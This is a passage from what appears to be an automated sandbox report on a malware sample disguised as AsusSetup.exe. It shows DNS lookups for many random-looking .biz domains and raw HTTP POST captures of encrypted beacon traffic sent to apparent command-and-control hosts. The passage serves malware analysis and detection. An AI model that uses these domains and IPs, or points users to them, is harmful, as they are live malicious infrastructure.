                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195848942 CET1.1.1.1192.168.2.50x4c39No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195888996 CET1.1.1.1192.168.2.50x4c39No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.639446974 CET1.1.1.1192.168.2.50xaa11No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.948714972 CET1.1.1.1192.168.2.50xcf2fNo error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.830969095 CET1.1.1.1192.168.2.50x1f81No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.831022024 CET1.1.1.1192.168.2.50x1f81No error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.912482023 CET1.1.1.1192.168.2.50x7673No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.638003111 CET1.1.1.1192.168.2.50x4528No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.621853113 CET1.1.1.1192.168.2.50x5a6dNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.489981890 CET1.1.1.1192.168.2.50xe503No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.342746019 CET1.1.1.1192.168.2.50x179fNo error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.642637014 CET1.1.1.1192.168.2.50x2dbfNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.643920898 CET1.1.1.1192.168.2.50x2dbfNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.331598997 CET1.1.1.1192.168.2.50xe2c2No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.058105946 CET1.1.1.1192.168.2.50xba4fNo error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.736538887 CET1.1.1.1192.168.2.50x3b71No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434878111 CET1.1.1.1192.168.2.50x8436No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.898654938 CET1.1.1.1192.168.2.50xed7dNo error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.573326111 CET1.1.1.1192.168.2.50x51b1No error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.573326111 CET1.1.1.1192.168.2.50x51b1No error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.057043076 CET1.1.1.1192.168.2.50x5ea5No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.187935114 CET1.1.1.1192.168.2.50xa951No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.888478041 CET1.1.1.1192.168.2.50x8531No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.741265059 CET1.1.1.1192.168.2.50x55fbNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875269890 CET1.1.1.1192.168.2.50x55f8No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875370026 CET1.1.1.1192.168.2.50x55f8No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.879863024 CET1.1.1.1192.168.2.50xc52aNo error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.800915003 CET1.1.1.1192.168.2.50x2dcdNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346066952 CET1.1.1.1192.168.2.50xabd0No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346221924 CET1.1.1.1192.168.2.50xabd0No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.847137928 CET1.1.1.1192.168.2.50x2ad4No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.534884930 CET1.1.1.1192.168.2.50xa4e4No error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324201107 CET1.1.1.1192.168.2.50x2abfNo error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324506044 CET1.1.1.1192.168.2.50x2abfNo error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.008375883 CET1.1.1.1192.168.2.50x6e7aNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.891592979 CET1.1.1.1192.168.2.50x74cfNo error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.580157042 CET1.1.1.1192.168.2.50xeea7No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.437978029 CET1.1.1.1192.168.2.50x9b2dNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.281899929 CET1.1.1.1192.168.2.50x3390No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.094315052 CET1.1.1.1192.168.2.50x6b33No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.543230057 CET1.1.1.1192.168.2.50xe813No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.228643894 CET1.1.1.1192.168.2.50x1790No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.917493105 CET1.1.1.1192.168.2.50x4ef8No error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.738199949 CET1.1.1.1192.168.2.50xd87dNo error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.191303015 CET1.1.1.1192.168.2.50xf4bNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.894248962 CET1.1.1.1192.168.2.50xf19bNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.274249077 CET1.1.1.1192.168.2.50xe5e0No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.297322989 CET1.1.1.1192.168.2.50x6b5eNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.725974083 CET1.1.1.1192.168.2.50x48e5No error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.764786005 CET1.1.1.1192.168.2.50xfccfNo error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.127774954 CET1.1.1.1192.168.2.50x3b71No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.811053991 CET1.1.1.1192.168.2.50x7275No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.972095966 CET1.1.1.1192.168.2.50xee65No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.972496986 CET1.1.1.1192.168.2.50xee65No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.020433903 CET1.1.1.1192.168.2.50x545eNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.020634890 CET1.1.1.1192.168.2.50x545eNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.733566999 CET1.1.1.1192.168.2.50x869fNo error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.621171951 CET1.1.1.1192.168.2.50xa936No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.572206974 CET1.1.1.1192.168.2.50x9812No error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.572381020 CET1.1.1.1192.168.2.50x9812No error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.433012009 CET1.1.1.1192.168.2.50xce81No error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.282356977 CET1.1.1.1192.168.2.50x9b59No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.724096060 CET1.1.1.1192.168.2.50xe00dNo error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.668418884 CET1.1.1.1192.168.2.50xf0bbNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.668629885 CET1.1.1.1192.168.2.50xf0bbNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.352428913 CET1.1.1.1192.168.2.50xdc7No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.047836065 CET1.1.1.1192.168.2.50x373fNo error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.907679081 CET1.1.1.1192.168.2.50xd21eNo error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.601392031 CET1.1.1.1192.168.2.50xe651No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.470410109 CET1.1.1.1192.168.2.50x9973No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.185862064 CET1.1.1.1192.168.2.50xebfcNo error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.113341093 CET1.1.1.1192.168.2.50xee3bNo error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.973752022 CET1.1.1.1192.168.2.50x556fNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.849951982 CET1.1.1.1192.168.2.50xd3deNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.329271078 CET1.1.1.1192.168.2.50x9996No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.587981939 CET1.1.1.1192.168.2.50xe23No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.314738989 CET1.1.1.1192.168.2.50x43f0No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.314738989 CET1.1.1.1192.168.2.50x43f0No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.921621084 CET1.1.1.1192.168.2.50xf12bName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.931016922 CET1.1.1.1192.168.2.50x47bdNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.805684090 CET1.1.1.1192.168.2.50x1135Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.814454079 CET1.1.1.1192.168.2.50xc96fName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.824181080 CET1.1.1.1192.168.2.50xc69aNo error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                                                  • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  • giliplg.biz

                                                                                                                                                                                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  0192.168.2.54970454.244.188.177805880C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906426907 CET347OUTPOST /ea HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906460047 CET800OUTData Raw: 95 9f cf 89 e7 d9 d3 a4 14 03 00 00 64 61 8d ac ca f0 2e 70 f8 ee 3c 6e c9 04 20 da 45 bb 2b c8 33 ae fd 10 37 1b b4 8c 8b cb e0 6a 3c 30 51 4b bb f4 82 fa 6a c3 4b 5e bb c3 0d 1b b1 d2 c5 e9 16 62 8d 4a 1e d0 0e 9b ca 87 a2 59 7e 59 f6 bd 83 c3
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: da.p<n E+37j<0QKjK^bJY~Y9v+TxPNn,.c~{u|1iX?dSa4*J8"uA2QcqZ#mz8l2`jOY'#><%bCbp##gbS:ez3!>mFgx7
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.867952108 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:49:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=17ca32f998ed4d44dafd0914b115316e|155.94.241.188|1730130599|1730130599|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  1192.168.2.54970554.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.000165939 CET354OUTPOST /juldvutdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pywolwnvd.biz
